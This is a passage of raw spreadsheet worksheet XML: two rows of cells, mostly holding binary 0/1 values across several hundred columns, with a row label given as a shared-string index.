      </c>
      <c r="BS97">
        <v>0</v>
      </c>
      <c r="BT97">
        <v>0</v>
      </c>
      <c r="BU97">
        <v>0</v>
      </c>
      <c r="BV97">
        <v>0</v>
      </c>
      <c r="BW97">
        <v>0</v>
      </c>
      <c r="BX97">
        <v>1</v>
      </c>
      <c r="BY97">
        <v>0</v>
      </c>
      <c r="BZ97">
        <v>0</v>
      </c>
      <c r="CA97">
        <v>1</v>
      </c>
      <c r="CB97">
        <v>0</v>
      </c>
      <c r="CC97">
        <v>0</v>
      </c>
      <c r="CD97">
        <v>0</v>
      </c>
      <c r="CE97">
        <v>0</v>
      </c>
      <c r="CF97">
        <v>0</v>
      </c>
      <c r="CG97">
        <v>0</v>
      </c>
      <c r="CH97">
        <v>0</v>
      </c>
      <c r="CI97">
        <v>0</v>
      </c>
      <c r="CJ97">
        <v>0</v>
      </c>
      <c r="CK97">
        <v>0</v>
      </c>
      <c r="CL97">
        <v>0</v>
      </c>
      <c r="CM97">
        <v>0</v>
      </c>
      <c r="CN97">
        <v>0</v>
      </c>
      <c r="CO97">
        <v>0</v>
      </c>
      <c r="CP97">
        <v>0</v>
      </c>
      <c r="CQ97">
        <v>0</v>
      </c>
      <c r="CR97">
        <v>0</v>
      </c>
      <c r="CS97">
        <v>0</v>
      </c>
      <c r="CT97">
        <v>0</v>
      </c>
      <c r="CU97">
        <v>0</v>
      </c>
      <c r="CV97">
        <v>0</v>
      </c>
      <c r="CW97">
        <v>1</v>
      </c>
      <c r="CX97">
        <v>0</v>
      </c>
      <c r="CY97">
        <v>0</v>
      </c>
      <c r="CZ97">
        <v>1</v>
      </c>
      <c r="DA97">
        <v>0</v>
      </c>
      <c r="DB97">
        <v>0</v>
      </c>
      <c r="DC97">
        <v>0</v>
      </c>
      <c r="DD97">
        <v>0</v>
      </c>
      <c r="DE97">
        <v>0</v>
      </c>
      <c r="DF97">
        <v>0</v>
      </c>
      <c r="DG97">
        <v>0</v>
      </c>
      <c r="DH97">
        <v>0</v>
      </c>
      <c r="DI97">
        <v>0</v>
      </c>
      <c r="DJ97">
        <v>0</v>
      </c>
      <c r="DK97">
        <v>0</v>
      </c>
      <c r="DL97">
        <v>0</v>
      </c>
      <c r="DM97">
        <v>0</v>
      </c>
      <c r="DN97">
        <v>1</v>
      </c>
      <c r="DO97">
        <v>1</v>
      </c>
      <c r="DP97">
        <v>0</v>
      </c>
      <c r="DQ97">
        <v>0</v>
      </c>
      <c r="DR97">
        <v>0</v>
      </c>
      <c r="DS97">
        <v>0</v>
      </c>
      <c r="DT97">
        <v>0</v>
      </c>
      <c r="DU97">
        <v>0</v>
      </c>
      <c r="DV97">
        <v>0</v>
      </c>
      <c r="DW97">
        <v>0</v>
      </c>
      <c r="DX97">
        <v>0</v>
      </c>
      <c r="DY97">
        <v>0</v>
      </c>
      <c r="DZ97">
        <v>0</v>
      </c>
      <c r="EA97">
        <v>0</v>
      </c>
      <c r="EB97">
        <v>0</v>
      </c>
      <c r="EC97">
        <v>0</v>
      </c>
      <c r="ED97">
        <v>0</v>
      </c>
      <c r="EE97">
        <v>0</v>
      </c>
      <c r="EF97">
        <v>0</v>
      </c>
      <c r="EG97">
        <v>0</v>
      </c>
      <c r="EH97">
        <v>0</v>
      </c>
      <c r="EI97">
        <v>0</v>
      </c>
      <c r="EJ97">
        <v>0</v>
      </c>
      <c r="EK97">
        <v>0</v>
      </c>
      <c r="EL97">
        <v>0</v>
      </c>
      <c r="EM97">
        <v>0</v>
      </c>
      <c r="EN97">
        <v>0</v>
      </c>
      <c r="EO97">
        <v>0</v>
      </c>
      <c r="EP97">
        <v>0</v>
      </c>
      <c r="EQ97">
        <v>1</v>
      </c>
      <c r="ER97">
        <v>0</v>
      </c>
      <c r="ES97">
        <v>0</v>
      </c>
      <c r="ET97">
        <v>0</v>
      </c>
      <c r="EU97">
        <v>0</v>
      </c>
      <c r="EV97">
        <v>1</v>
      </c>
      <c r="EW97">
        <v>0</v>
      </c>
      <c r="EX97">
        <v>0</v>
      </c>
      <c r="EY97">
        <v>1</v>
      </c>
      <c r="EZ97">
        <v>0</v>
      </c>
      <c r="FA97">
        <v>1</v>
      </c>
      <c r="FB97">
        <v>0</v>
      </c>
      <c r="FC97">
        <v>0</v>
      </c>
      <c r="FD97">
        <v>0</v>
      </c>
      <c r="FE97">
        <v>0</v>
      </c>
      <c r="FF97">
        <v>0</v>
      </c>
      <c r="FG97">
        <v>0</v>
      </c>
      <c r="FH97">
        <v>0</v>
      </c>
      <c r="FI97">
        <v>0</v>
      </c>
      <c r="FJ97">
        <v>0</v>
      </c>
      <c r="FK97">
        <v>0</v>
      </c>
      <c r="FL97">
        <v>0</v>
      </c>
      <c r="FM97">
        <v>0</v>
      </c>
      <c r="FN97">
        <v>0</v>
      </c>
      <c r="FO97">
        <v>0</v>
      </c>
      <c r="FP97">
        <v>0</v>
      </c>
      <c r="FQ97">
        <v>0</v>
      </c>
      <c r="FR97">
        <v>0</v>
      </c>
      <c r="FS97">
        <v>1</v>
      </c>
      <c r="FT97">
        <v>0</v>
      </c>
      <c r="FU97">
        <v>0</v>
      </c>
      <c r="FV97">
        <v>0</v>
      </c>
      <c r="FW97">
        <v>0</v>
      </c>
      <c r="FX97">
        <v>0</v>
      </c>
      <c r="FY97">
        <v>0</v>
      </c>
      <c r="FZ97">
        <v>0</v>
      </c>
      <c r="GA97">
        <v>0</v>
      </c>
      <c r="GB97">
        <v>1</v>
      </c>
      <c r="GC97">
        <v>0</v>
      </c>
      <c r="GD97">
        <v>0</v>
      </c>
      <c r="GE97">
        <v>0</v>
      </c>
      <c r="GF97">
        <v>0</v>
      </c>
      <c r="GG97">
        <v>0</v>
      </c>
      <c r="GH97">
        <v>0</v>
      </c>
      <c r="GI97">
        <v>0</v>
      </c>
      <c r="GJ97">
        <v>0</v>
      </c>
      <c r="GK97">
        <v>0</v>
      </c>
      <c r="GL97">
        <v>0</v>
      </c>
      <c r="GM97">
        <v>0</v>
      </c>
      <c r="GN97">
        <v>0</v>
      </c>
      <c r="GO97">
        <v>0</v>
      </c>
      <c r="GP97">
        <v>0</v>
      </c>
      <c r="GQ97">
        <v>0</v>
      </c>
      <c r="GR97">
        <v>0</v>
      </c>
      <c r="GS97">
        <v>0</v>
      </c>
      <c r="GT97">
        <v>0</v>
      </c>
      <c r="GU97">
        <v>0</v>
      </c>
      <c r="GV97">
        <v>0</v>
      </c>
      <c r="GW97">
        <v>0</v>
      </c>
      <c r="GX97">
        <v>0</v>
      </c>
      <c r="GY97">
        <v>0</v>
      </c>
      <c r="GZ97">
        <v>0</v>
      </c>
      <c r="HA97">
        <v>0</v>
      </c>
      <c r="HB97">
        <v>1</v>
      </c>
      <c r="HC97">
        <v>0</v>
      </c>
      <c r="HD97">
        <v>0</v>
      </c>
      <c r="HE97">
        <v>0</v>
      </c>
      <c r="HF97">
        <v>0</v>
      </c>
      <c r="HG97">
        <v>0</v>
      </c>
      <c r="HH97">
        <v>0</v>
      </c>
      <c r="HI97">
        <v>0</v>
      </c>
      <c r="HJ97">
        <v>0</v>
      </c>
      <c r="HK97">
        <v>0</v>
      </c>
      <c r="HL97">
        <v>0</v>
      </c>
      <c r="HM97">
        <v>0</v>
      </c>
      <c r="HN97">
        <v>0</v>
      </c>
      <c r="HO97">
        <v>0</v>
      </c>
      <c r="HP97">
        <v>0</v>
      </c>
      <c r="HQ97">
        <v>0</v>
      </c>
      <c r="HR97">
        <v>0</v>
      </c>
      <c r="HS97">
        <v>0</v>
      </c>
      <c r="HT97">
        <v>0</v>
      </c>
      <c r="HU97">
        <v>0</v>
      </c>
      <c r="HV97">
        <v>1</v>
      </c>
      <c r="HW97">
        <v>0</v>
      </c>
      <c r="HX97">
        <v>0</v>
      </c>
      <c r="HY97">
        <v>0</v>
      </c>
      <c r="HZ97">
        <v>0</v>
      </c>
      <c r="IA97">
        <v>0</v>
      </c>
      <c r="IB97">
        <v>0</v>
      </c>
      <c r="IC97">
        <v>1</v>
      </c>
      <c r="ID97">
        <v>0</v>
      </c>
      <c r="IE97">
        <v>0</v>
      </c>
      <c r="IF97">
        <v>0</v>
      </c>
      <c r="IG97">
        <v>0</v>
      </c>
      <c r="IH97">
        <v>0</v>
      </c>
      <c r="II97">
        <v>0</v>
      </c>
      <c r="IJ97">
        <v>0</v>
      </c>
      <c r="IK97">
        <v>0</v>
      </c>
      <c r="IL97">
        <v>0</v>
      </c>
      <c r="IM97">
        <v>0</v>
      </c>
      <c r="IN97">
        <v>0</v>
      </c>
      <c r="IO97">
        <v>0</v>
      </c>
      <c r="IP97">
        <v>0</v>
      </c>
      <c r="IQ97">
        <v>0</v>
      </c>
      <c r="IR97">
        <v>0</v>
      </c>
      <c r="IS97">
        <v>0</v>
      </c>
      <c r="IT97">
        <v>0</v>
      </c>
      <c r="IU97">
        <v>0</v>
      </c>
      <c r="IV97">
        <v>0</v>
      </c>
      <c r="IW97">
        <v>0</v>
      </c>
      <c r="IX97">
        <v>0</v>
      </c>
      <c r="IY97">
        <v>0</v>
      </c>
      <c r="IZ97">
        <v>0</v>
      </c>
      <c r="JA97">
        <v>0</v>
      </c>
      <c r="JB97">
        <v>0</v>
      </c>
      <c r="JC97">
        <v>0</v>
      </c>
      <c r="JD97">
        <v>0</v>
      </c>
      <c r="JE97">
        <v>0</v>
      </c>
      <c r="JF97">
        <v>0</v>
      </c>
      <c r="JG97">
        <v>0</v>
      </c>
      <c r="JH97">
        <v>0</v>
      </c>
      <c r="JI97">
        <v>0</v>
      </c>
      <c r="JJ97">
        <v>0</v>
      </c>
      <c r="JK97">
        <v>0</v>
      </c>
      <c r="JL97">
        <v>0</v>
      </c>
      <c r="JM97">
        <v>0</v>
      </c>
      <c r="JN97">
        <v>0</v>
      </c>
      <c r="JO97">
        <v>0</v>
      </c>
      <c r="JP97">
        <v>0</v>
      </c>
      <c r="JQ97">
        <v>0</v>
      </c>
      <c r="JR97">
        <v>0</v>
      </c>
      <c r="JS97">
        <v>0</v>
      </c>
      <c r="JT97">
        <v>0</v>
      </c>
      <c r="JU97">
        <v>0</v>
      </c>
      <c r="JV97">
        <v>0</v>
      </c>
      <c r="JW97">
        <v>0</v>
      </c>
      <c r="JX97">
        <v>0</v>
      </c>
      <c r="JY97">
        <v>0</v>
      </c>
      <c r="JZ97">
        <v>0</v>
      </c>
      <c r="KA97">
        <v>0</v>
      </c>
      <c r="KB97">
        <v>0</v>
      </c>
      <c r="KC97">
        <v>1</v>
      </c>
      <c r="KD97">
        <v>0</v>
      </c>
      <c r="KE97">
        <v>1</v>
      </c>
      <c r="KF97">
        <v>0</v>
      </c>
      <c r="KG97">
        <v>0</v>
      </c>
      <c r="KH97">
        <v>0</v>
      </c>
      <c r="KI97">
        <v>0</v>
      </c>
      <c r="KJ97">
        <v>0</v>
      </c>
      <c r="KK97">
        <v>0</v>
      </c>
      <c r="KL97">
        <v>1</v>
      </c>
      <c r="KM97">
        <v>1</v>
      </c>
      <c r="KN97">
        <v>0</v>
      </c>
      <c r="KO97">
        <v>0</v>
      </c>
      <c r="KP97">
        <v>0</v>
      </c>
      <c r="KQ97">
        <v>0</v>
      </c>
      <c r="KR97">
        <v>0</v>
      </c>
      <c r="KS97">
        <v>0</v>
      </c>
      <c r="KT97">
        <v>1</v>
      </c>
      <c r="KU97">
        <v>0</v>
      </c>
      <c r="KV97">
        <v>0</v>
      </c>
      <c r="KW97">
        <v>0</v>
      </c>
      <c r="KX97">
        <v>0</v>
      </c>
      <c r="KY97">
        <v>0</v>
      </c>
      <c r="KZ97">
        <v>0</v>
      </c>
      <c r="LA97">
        <v>0</v>
      </c>
      <c r="LB97">
        <v>0</v>
      </c>
      <c r="LC97">
        <v>0</v>
      </c>
      <c r="LD97">
        <v>0</v>
      </c>
      <c r="LE97">
        <v>0</v>
      </c>
      <c r="LF97">
        <v>0</v>
      </c>
      <c r="LG97">
        <v>0</v>
      </c>
      <c r="LH97">
        <v>0</v>
      </c>
      <c r="LI97">
        <v>0</v>
      </c>
      <c r="LJ97">
        <v>1</v>
      </c>
      <c r="LK97">
        <v>0</v>
      </c>
      <c r="LL97">
        <v>0</v>
      </c>
      <c r="LM97">
        <v>0</v>
      </c>
      <c r="LN97">
        <v>0</v>
      </c>
      <c r="LO97">
        <v>0</v>
      </c>
      <c r="LP97">
        <v>0</v>
      </c>
      <c r="LQ97">
        <v>0</v>
      </c>
      <c r="LR97">
        <v>1</v>
      </c>
      <c r="LS97">
        <v>0</v>
      </c>
      <c r="LT97">
        <v>0</v>
      </c>
      <c r="LU97">
        <v>0</v>
      </c>
      <c r="LV97">
        <v>0</v>
      </c>
      <c r="LW97">
        <v>0</v>
      </c>
      <c r="LX97">
        <v>0</v>
      </c>
      <c r="LY97">
        <v>0</v>
      </c>
      <c r="LZ97">
        <v>0</v>
      </c>
      <c r="MA97">
        <v>0</v>
      </c>
      <c r="MB97">
        <v>0</v>
      </c>
      <c r="MC97">
        <v>0</v>
      </c>
      <c r="MD97">
        <v>0</v>
      </c>
      <c r="ME97">
        <v>0</v>
      </c>
      <c r="MF97">
        <v>0</v>
      </c>
      <c r="MG97">
        <v>0</v>
      </c>
      <c r="MH97">
        <v>0</v>
      </c>
      <c r="MI97">
        <v>0</v>
      </c>
      <c r="MJ97">
        <v>0</v>
      </c>
      <c r="MK97">
        <v>0</v>
      </c>
      <c r="ML97">
        <v>0</v>
      </c>
      <c r="MM97">
        <v>0</v>
      </c>
      <c r="MN97">
        <v>0</v>
      </c>
      <c r="MO97">
        <v>0</v>
      </c>
      <c r="MP97">
        <v>0</v>
      </c>
      <c r="MQ97">
        <v>0</v>
      </c>
      <c r="MR97">
        <v>0</v>
      </c>
      <c r="MS97">
        <v>0</v>
      </c>
      <c r="MT97">
        <v>0</v>
      </c>
      <c r="MU97">
        <v>0</v>
      </c>
      <c r="MV97">
        <v>0</v>
      </c>
      <c r="MW97">
        <v>0</v>
      </c>
      <c r="MX97">
        <v>0</v>
      </c>
      <c r="MY97">
        <v>0</v>
      </c>
      <c r="MZ97">
        <v>0</v>
      </c>
      <c r="NA97">
        <v>0</v>
      </c>
      <c r="NB97">
        <v>0</v>
      </c>
      <c r="NC97">
        <v>0</v>
      </c>
      <c r="ND97">
        <v>0</v>
      </c>
      <c r="NE97">
        <v>0</v>
      </c>
      <c r="NF97">
        <v>0</v>
      </c>
      <c r="NG97">
        <v>0</v>
      </c>
      <c r="NH97">
        <v>0</v>
      </c>
      <c r="NI97">
        <v>0</v>
      </c>
      <c r="NJ97">
        <v>0</v>
      </c>
      <c r="NK97">
        <v>0</v>
      </c>
      <c r="NL97">
        <v>0</v>
      </c>
      <c r="NM97">
        <v>0</v>
      </c>
      <c r="NN97">
        <v>0</v>
      </c>
      <c r="NO97">
        <v>0</v>
      </c>
      <c r="NP97">
        <v>0</v>
      </c>
      <c r="NQ97">
        <v>0</v>
      </c>
      <c r="NR97">
        <v>0</v>
      </c>
      <c r="NS97">
        <v>0</v>
      </c>
      <c r="NT97">
        <v>1</v>
      </c>
      <c r="NU97">
        <v>0</v>
      </c>
      <c r="NV97">
        <v>0</v>
      </c>
      <c r="NW97">
        <v>0</v>
      </c>
      <c r="NX97">
        <v>0</v>
      </c>
      <c r="NY97">
        <v>0</v>
      </c>
      <c r="NZ97">
        <v>0</v>
      </c>
      <c r="OA97">
        <v>0</v>
      </c>
      <c r="OB97">
        <v>0</v>
      </c>
      <c r="OC97">
        <v>0</v>
      </c>
      <c r="OD97">
        <v>0</v>
      </c>
      <c r="OE97">
        <v>0</v>
      </c>
      <c r="OF97">
        <v>0</v>
      </c>
      <c r="OG97">
        <v>0</v>
      </c>
      <c r="OH97">
        <v>0</v>
      </c>
      <c r="OI97">
        <v>0</v>
      </c>
      <c r="OJ97">
        <v>0</v>
      </c>
      <c r="OK97">
        <v>0</v>
      </c>
      <c r="OL97">
        <v>1</v>
      </c>
      <c r="OM97">
        <v>1</v>
      </c>
      <c r="ON97">
        <v>0</v>
      </c>
      <c r="OO97">
        <v>0</v>
      </c>
      <c r="OP97">
        <v>0</v>
      </c>
      <c r="OQ97">
        <v>0</v>
      </c>
      <c r="OR97">
        <v>0</v>
      </c>
      <c r="OS97">
        <v>0</v>
      </c>
      <c r="OT97">
        <v>0</v>
      </c>
      <c r="OU97">
        <v>0</v>
      </c>
      <c r="OV97">
        <v>0</v>
      </c>
      <c r="OW97">
        <v>0</v>
      </c>
      <c r="OX97">
        <v>0</v>
      </c>
      <c r="OY97">
        <v>0</v>
      </c>
      <c r="OZ97">
        <v>0</v>
      </c>
      <c r="PA97">
        <v>0</v>
      </c>
      <c r="PB97">
        <v>0</v>
      </c>
      <c r="PC97">
        <v>0</v>
      </c>
      <c r="PD97">
        <v>0</v>
      </c>
      <c r="PE97">
        <v>1</v>
      </c>
      <c r="PF97">
        <v>0</v>
      </c>
      <c r="PG97">
        <v>1</v>
      </c>
      <c r="PH97">
        <v>0</v>
      </c>
      <c r="PI97">
        <v>0</v>
      </c>
      <c r="PJ97">
        <v>0</v>
      </c>
      <c r="PK97">
        <v>0</v>
      </c>
      <c r="PL97">
        <v>0</v>
      </c>
      <c r="PM97">
        <v>0</v>
      </c>
      <c r="PN97">
        <v>0</v>
      </c>
      <c r="PO97">
        <v>0</v>
      </c>
      <c r="PP97">
        <v>0</v>
      </c>
      <c r="PQ97">
        <v>0</v>
      </c>
      <c r="PR97">
        <v>0</v>
      </c>
      <c r="PS97">
        <v>0</v>
      </c>
      <c r="PT97">
        <v>0</v>
      </c>
      <c r="PU97">
        <v>0</v>
      </c>
      <c r="PV97">
        <v>0</v>
      </c>
      <c r="PW97">
        <v>1</v>
      </c>
      <c r="PX97">
        <v>0</v>
      </c>
      <c r="PY97">
        <v>0</v>
      </c>
      <c r="PZ97">
        <v>0</v>
      </c>
      <c r="QA97">
        <v>1</v>
      </c>
      <c r="QB97">
        <v>0</v>
      </c>
      <c r="QC97">
        <v>1</v>
      </c>
      <c r="QD97">
        <v>1</v>
      </c>
      <c r="QE97">
        <v>0</v>
      </c>
      <c r="QF97">
        <v>0</v>
      </c>
      <c r="QG97">
        <v>0</v>
      </c>
      <c r="QH97">
        <v>0</v>
      </c>
      <c r="QI97">
        <v>0</v>
      </c>
      <c r="QJ97">
        <v>0</v>
      </c>
      <c r="QK97">
        <v>0</v>
      </c>
      <c r="QL97">
        <v>0</v>
      </c>
      <c r="QM97">
        <v>0</v>
      </c>
      <c r="QN97">
        <v>0</v>
      </c>
      <c r="QO97">
        <v>1</v>
      </c>
      <c r="QP97">
        <v>0</v>
      </c>
      <c r="QQ97">
        <v>0</v>
      </c>
      <c r="QR97">
        <v>0</v>
      </c>
      <c r="QS97">
        <v>1</v>
      </c>
      <c r="QT97">
        <v>0</v>
      </c>
      <c r="QU97">
        <v>0</v>
      </c>
      <c r="QV97">
        <v>0</v>
      </c>
      <c r="QW97">
        <v>0</v>
      </c>
      <c r="QX97">
        <v>1</v>
      </c>
      <c r="QY97">
        <v>0</v>
      </c>
      <c r="QZ97">
        <v>0</v>
      </c>
      <c r="RA97">
        <v>0</v>
      </c>
      <c r="RB97">
        <v>0</v>
      </c>
      <c r="RC97">
        <v>0</v>
      </c>
      <c r="RD97">
        <v>0</v>
      </c>
      <c r="RE97">
        <v>0</v>
      </c>
      <c r="RF97">
        <v>0</v>
      </c>
      <c r="RG97">
        <v>0</v>
      </c>
      <c r="RH97">
        <v>0</v>
      </c>
      <c r="RI97">
        <v>0</v>
      </c>
      <c r="RJ97">
        <v>0</v>
      </c>
      <c r="RK97">
        <v>0</v>
      </c>
      <c r="RL97">
        <v>0</v>
      </c>
      <c r="RM97">
        <v>0</v>
      </c>
      <c r="RN97">
        <v>0</v>
      </c>
      <c r="RO97">
        <v>0</v>
      </c>
      <c r="RP97">
        <v>0</v>
      </c>
      <c r="RQ97">
        <v>0</v>
      </c>
      <c r="RR97">
        <v>0</v>
      </c>
      <c r="RS97">
        <v>0</v>
      </c>
      <c r="RT97">
        <v>0</v>
      </c>
      <c r="RU97">
        <v>0</v>
      </c>
      <c r="RV97">
        <v>0</v>
      </c>
      <c r="RW97">
        <v>0</v>
      </c>
      <c r="RX97">
        <v>0</v>
      </c>
      <c r="RY97">
        <v>0</v>
      </c>
      <c r="RZ97">
        <v>0</v>
      </c>
      <c r="SA97">
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A98" s="6" t="s">
        <v>3503</v>
      </c>
      <c r="B98">
        <v>95</v>
      </c>
      <c r="C98">
        <v>1</v>
      </c>
      <c r="D98">
        <v>1</v>
      </c>
      <c r="E98">
        <v>0</v>
      </c>
      <c r="F98">
        <v>1</v>
      </c>
      <c r="G98">
        <v>0</v>
      </c>
      <c r="H98">
        <v>0</v>
      </c>
      <c r="I98">
        <v>0</v>
      </c>
      <c r="J98">
        <v>0</v>
      </c>
      <c r="K98">
        <v>0</v>
      </c>
      <c r="L98">
        <v>0</v>
      </c>
      <c r="M98">
        <v>0</v>
      </c>
      <c r="N98">
        <v>0</v>
      </c>
      <c r="O98">
        <v>0</v>
      </c>
      <c r="P98">
        <v>1</v>
      </c>
      <c r="Q98">
        <v>0</v>
      </c>
      <c r="R98">
        <v>0</v>
      </c>
      <c r="S98">
        <v>0</v>
      </c>
      <c r="T98">
        <v>1</v>
      </c>
      <c r="U98">
        <v>0</v>
      </c>
      <c r="V98">
        <v>1</v>
      </c>
      <c r="W98">
        <v>1</v>
      </c>
      <c r="X98">
        <v>0</v>
      </c>
      <c r="Y98">
        <v>1</v>
      </c>
      <c r="Z98">
        <v>0</v>
      </c>
      <c r="AA98">
        <v>0</v>
      </c>
      <c r="AB98">
        <v>0</v>
      </c>
      <c r="AC98">
        <v>1</v>
      </c>
      <c r="AD98">
        <v>0</v>
      </c>
      <c r="AE98">
        <v>0</v>
      </c>
      <c r="AF98">
        <v>0</v>
      </c>
      <c r="AG98">
        <v>0</v>
      </c>
      <c r="AH98">
        <v>0</v>
      </c>
      <c r="AI98">
        <v>0</v>
      </c>
      <c r="AJ98">
        <v>0</v>
      </c>
      <c r="AK98">
        <v>0</v>
      </c>
      <c r="AL98">
        <v>0</v>
      </c>
      <c r="AM98">
        <v>0</v>
      </c>
      <c r="AN98">
        <v>0</v>
      </c>
      <c r="AO98">
        <v>1</v>
      </c>
      <c r="AP98">
        <v>1</v>
      </c>
      <c r="AQ98">
        <v>1</v>
      </c>
      <c r="AR98">
        <v>0</v>
      </c>
      <c r="AS98">
        <v>0</v>
      </c>
      <c r="AT98">
        <v>0</v>
      </c>
      <c r="AU98">
        <v>0</v>
      </c>
      <c r="AV98">
        <v>1</v>
      </c>
      <c r="AW98">
        <v>0</v>
      </c>
      <c r="AX98">
        <v>0</v>
      </c>
      <c r="AY98">
        <v>0</v>
      </c>
      <c r="AZ98">
        <v>0</v>
      </c>
      <c r="BA98">
        <v>0</v>
      </c>
      <c r="BB98">
        <v>0</v>
      </c>
      <c r="BC98">
        <v>0</v>
      </c>
      <c r="BD98">
        <v>1</v>
      </c>
      <c r="BE98">
        <v>0</v>
      </c>
      <c r="BF98">
        <v>1</v>
      </c>
      <c r="BG98">
        <v>0</v>
      </c>
      <c r="BH98">
        <v>0</v>
      </c>
      <c r="BI98">
        <v>0</v>
      </c>
      <c r="BJ98">
        <v>0</v>
      </c>
      <c r="BK98">
        <v>1</v>
      </c>
      <c r="BL98">
        <v>0</v>
      </c>
      <c r="BM98">
        <v>1</v>
      </c>
      <c r="BN98">
        <v>0</v>
      </c>
      <c r="BO98">
        <v>0</v>
      </c>
      <c r="BP98">
        <v>1</v>
      </c>
      <c r="BQ98">
        <v>0</v>
      </c>
      <c r="BR98">
        <v>0</v>
      </c>
      <c r="BS98">
        <v>1</v>
      </c>
      <c r="BT98">
        <v>1</v>
      </c>
      <c r="BU98">
        <v>0</v>
      </c>
      <c r="BV98">
        <v>0</v>
      </c>
      <c r="BW98">
        <v>0</v>
      </c>
      <c r="BX98">
        <v>1</v>
      </c>
      <c r="BY98">
        <v>0</v>
      </c>
      <c r="BZ98">
        <v>0</v>
      </c>
      <c r="CA98">
        <v>0</v>
      </c>
      <c r="CB98">
        <v>1</v>
      </c>
      <c r="CC98">
        <v>0</v>
      </c>
      <c r="CD98">
        <v>0</v>
      </c>
      <c r="CE98">
        <v>0</v>
      </c>
      <c r="CF98">
        <v>1</v>
      </c>
      <c r="CG98">
        <v>0</v>
      </c>
      <c r="CH98">
        <v>0</v>
      </c>
      <c r="CI98">
        <v>0</v>
      </c>
      <c r="CJ98">
        <v>0</v>
      </c>
      <c r="CK98">
        <v>0</v>
      </c>
      <c r="CL98">
        <v>0</v>
      </c>
      <c r="CM98">
        <v>0</v>
      </c>
      <c r="CN98">
        <v>0</v>
      </c>
      <c r="CO98">
        <v>0</v>
      </c>
      <c r="CP98">
        <v>0</v>
      </c>
      <c r="CQ98">
        <v>1</v>
      </c>
      <c r="CR98">
        <v>0</v>
      </c>
      <c r="CS98">
        <v>0</v>
      </c>
      <c r="CT98">
        <v>1</v>
      </c>
      <c r="CU98">
        <v>1</v>
      </c>
      <c r="CV98">
        <v>0</v>
      </c>
      <c r="CW98">
        <v>0</v>
      </c>
      <c r="CX98">
        <v>0</v>
      </c>
      <c r="CY98">
        <v>1</v>
      </c>
      <c r="CZ98">
        <v>1</v>
      </c>
      <c r="DA98">
        <v>0</v>
      </c>
      <c r="DB98">
        <v>0</v>
      </c>
      <c r="DC98">
        <v>0</v>
      </c>
      <c r="DD98">
        <v>1</v>
      </c>
      <c r="DE98">
        <v>0</v>
      </c>
      <c r="DF98">
        <v>0</v>
      </c>
      <c r="DG98">
        <v>0</v>
      </c>
      <c r="DH98">
        <v>0</v>
      </c>
      <c r="DI98">
        <v>0</v>
      </c>
      <c r="DJ98">
        <v>1</v>
      </c>
      <c r="DK98">
        <v>0</v>
      </c>
      <c r="DL98">
        <v>1</v>
      </c>
      <c r="DM98">
        <v>1</v>
      </c>
      <c r="DN98">
        <v>0</v>
      </c>
      <c r="DO98">
        <v>0</v>
      </c>
      <c r="DP98">
        <v>1</v>
      </c>
      <c r="DQ98">
        <v>0</v>
      </c>
      <c r="DR98">
        <v>0</v>
      </c>
      <c r="DS98">
        <v>0</v>
      </c>
      <c r="DT98">
        <v>0</v>
      </c>
      <c r="DU98">
        <v>0</v>
      </c>
      <c r="DV98">
        <v>1</v>
      </c>
      <c r="DW98">
        <v>1</v>
      </c>
      <c r="DX98">
        <v>0</v>
      </c>
      <c r="DY98">
        <v>0</v>
      </c>
      <c r="DZ98">
        <v>0</v>
      </c>
      <c r="EA98">
        <v>0</v>
      </c>
      <c r="EB98">
        <v>1</v>
      </c>
      <c r="EC98">
        <v>1</v>
      </c>
      <c r="ED98">
        <v>1</v>
      </c>
      <c r="EE98">
        <v>0</v>
      </c>
      <c r="EF98">
        <v>0</v>
      </c>
      <c r="EG98">
        <v>0</v>
      </c>
      <c r="EH98">
        <v>0</v>
      </c>
      <c r="EI98">
        <v>1</v>
      </c>
      <c r="EJ98">
        <v>0</v>
      </c>
      <c r="EK98">
        <v>0</v>
      </c>
      <c r="EL98">
        <v>0</v>
      </c>
      <c r="EM98">
        <v>0</v>
      </c>
      <c r="EN98">
        <v>0</v>
      </c>
      <c r="EO98">
        <v>0</v>
      </c>
      <c r="EP98">
        <v>0</v>
      </c>
      <c r="EQ98">
        <v>1</v>
      </c>
      <c r="ER98">
        <v>0</v>
      </c>
      <c r="ES98">
        <v>0</v>
      </c>
      <c r="ET98">
        <v>0</v>
      </c>
      <c r="EU98">
        <v>0</v>
      </c>
      <c r="EV98">
        <v>0</v>
      </c>
      <c r="EW98">
        <v>0</v>
      </c>
      <c r="EX98">
        <v>0</v>
      </c>
      <c r="EY98">
        <v>0</v>
      </c>
      <c r="EZ98">
        <v>0</v>
      </c>
      <c r="FA98">
        <v>1</v>
      </c>
      <c r="FB98">
        <v>0</v>
      </c>
      <c r="FC98">
        <v>1</v>
      </c>
      <c r="FD98">
        <v>0</v>
      </c>
      <c r="FE98">
        <v>1</v>
      </c>
      <c r="FF98">
        <v>0</v>
      </c>
      <c r="FG98">
        <v>0</v>
      </c>
      <c r="FH98">
        <v>0</v>
      </c>
      <c r="FI98">
        <v>0</v>
      </c>
      <c r="FJ98">
        <v>0</v>
      </c>
      <c r="FK98">
        <v>0</v>
      </c>
      <c r="FL98">
        <v>0</v>
      </c>
      <c r="FM98">
        <v>0</v>
      </c>
      <c r="FN98">
        <v>0</v>
      </c>
      <c r="FO98">
        <v>0</v>
      </c>
      <c r="FP98">
        <v>0</v>
      </c>
      <c r="FQ98">
        <v>0</v>
      </c>
      <c r="FR98">
        <v>1</v>
      </c>
      <c r="FS98">
        <v>1</v>
      </c>
      <c r="FT98">
        <v>1</v>
      </c>
      <c r="FU98">
        <v>1</v>
      </c>
      <c r="FV98">
        <v>0</v>
      </c>
      <c r="FW98">
        <v>1</v>
      </c>
      <c r="FX98">
        <v>1</v>
      </c>
      <c r="FY98">
        <v>0</v>
      </c>
      <c r="FZ98">
        <v>1</v>
      </c>
      <c r="GA98">
        <v>0</v>
      </c>
      <c r="GB98">
        <v>0</v>
      </c>
      <c r="GC98">
        <v>0</v>
      </c>
      <c r="GD98">
        <v>0</v>
      </c>
      <c r="GE98">
        <v>0</v>
      </c>
      <c r="GF98">
        <v>1</v>
      </c>
      <c r="GG98">
        <v>0</v>
      </c>
      <c r="GH98">
        <v>0</v>
      </c>
      <c r="GI98">
        <v>0</v>
      </c>
      <c r="GJ98">
        <v>0</v>
      </c>
      <c r="GK98">
        <v>0</v>
      </c>
      <c r="GL98">
        <v>0</v>
      </c>
      <c r="GM98">
        <v>0</v>
      </c>
      <c r="GN98">
        <v>0</v>
      </c>
